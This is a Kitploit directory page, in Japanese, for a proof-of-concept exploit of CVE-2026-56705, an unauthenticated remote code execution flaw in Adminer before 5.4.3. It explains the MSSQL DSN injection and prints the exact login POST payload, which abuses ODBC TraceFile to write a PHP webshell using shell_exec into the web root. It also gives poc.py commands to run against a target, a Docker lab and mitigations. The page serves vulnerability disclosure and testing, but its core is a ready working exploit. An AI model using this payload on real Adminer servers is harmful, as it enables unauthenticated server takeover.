Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/boreas37/cve-2026-56705
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育レッドチーミングラボと実践
GitHubboreas37/cve-2026-56705

CVE-2026-56705

PoCエクスプロイト: Adminer < 5.4.3 における MSSQL PDO DSN インジェクションを介した未認証RCE。Dockerラボとネガティブテストを含む。

リポジトリを見る
21日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-56705: Adminer < 5.4.3 — MSSQL PDO DSNインジェクションによる未認証RCE

CVECVE-2026-56705
GHSAGHSA-r4x9-5m63-3vxw(ベンダー勧告)/ GHSA-34q8-53jm-qc2r(GitHub DB)
製品Adminer(単一ファイルPHPデータベース管理ツール)
影響を受けるバージョンpdo_sqlsrv + Microsoft ODBC Driver for SQL Serverを使用するAdminer < 5.4.3
修正バージョン5.4.3
CVSS9.8 Critical (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
タイプCWE-20 → 未認証の任意ファイル書き込み → RCE

概要

Adminerは、MSSQL接続用のPDO DSNを構築する際に、ユーザーが指定したserverフィールドをサニタイズできていません:

root@kitploit:~
// adminer/drivers/mssql.inc.php
function attach(string $server, string $username, string $password): string {
    list($host, $port) = host_port($server);
    return $this->dsn("sqlsrv:Server=$host" . ($port ? ",$port" : ""), $username, $password);
}

server内のセミコロンはODBC接続属性の区切り文字として扱われるため、未認証の攻撃者はTraceFileやTraceOnを含む任意の属性をDSNに追加できます。unixODBCのトレース機能は、接続試行の成功に関係なく、その前にかつ無条件に、完全な接続文字列(UID={username}をそのまま含む)をTraceFileに書き込みます。usernameフィールドを介してPHPコードを注入し、TraceFileをWebルートに指定することで、Webシェルが生成されます。

単一の未認証ログインPOSTで十分です。有効な認証情報も、ユーザーの操作も不要です。

悪用方法

root@kitploit:~
auth[driver]   = mssql
auth[server]   = 127.0.0.1;TraceFile=/var/www/shell.php;TraceOn=1
auth[username] = <?php echo 'POC::'.shell_exec($_GET['c']);?>
auth[password] = x
  1. ログインPOSTにより、DSN sqlsrv:Server=127.0.0.1;TraceFile=/var/www/shell.php;TraceOn=1が構築される
  2. ODBCドライバマネージャがUID={<?php ... ?>}を含むトレースを/var/www/shell.phpに書き込む
  3. 接続は失敗する(想定通り、無関係)— ファイルはすでに書き込まれている
  4. GET /shell.php?c=id → コマンドが実行される

使用方法

root@kitploit:~
# フィンガープリントのみ
python3 poc.py --target http://target/adminer.php --check

# 完全なエクスプロイト(Webルートに<random>.phpを書き込む)
python3 poc.py --target http://target/adminer.php --command "id"

ラボでの再現

root@kitploit:~
cd lab/
docker build -t adminer-cve-2026-56705 .
docker run -d -p 8081:8081 adminer-cve-2026-56705
python3 ../poc.py --target http://localhost:8081/adminer.php --command id

ラボイメージは勧告の前提条件を正確に再現しています: php:8.3-cli + pdo_sqlsrv(pecl)+ msodbcsql18、WebルートはPHPプロセスによる書き込みが可能です。

対策

  • Adminer 5.4.3以降にアップグレードしてください。
  • すぐにアップグレードできない場合: mssqlドライバを削除/ブロックするか、リバースプロキシでユーザー指定のserver値から;(および空白)を除去してください。
  • 多層防御として、PHP-FPM/CLIユーザーによるWebルートへの書き込みを制限してください。

クレジット

ベンダー勧告では、この発見は報告者とYashar Shahinzadeh(@voorivex)の共同発見とされています。

PoC & ラボ: Hamza Cagrici(@Boreas37)

タイムライン

日付イベント
2026-08-25CVE公開 / Adminer 5.4.3で修正
ツールをダウンロード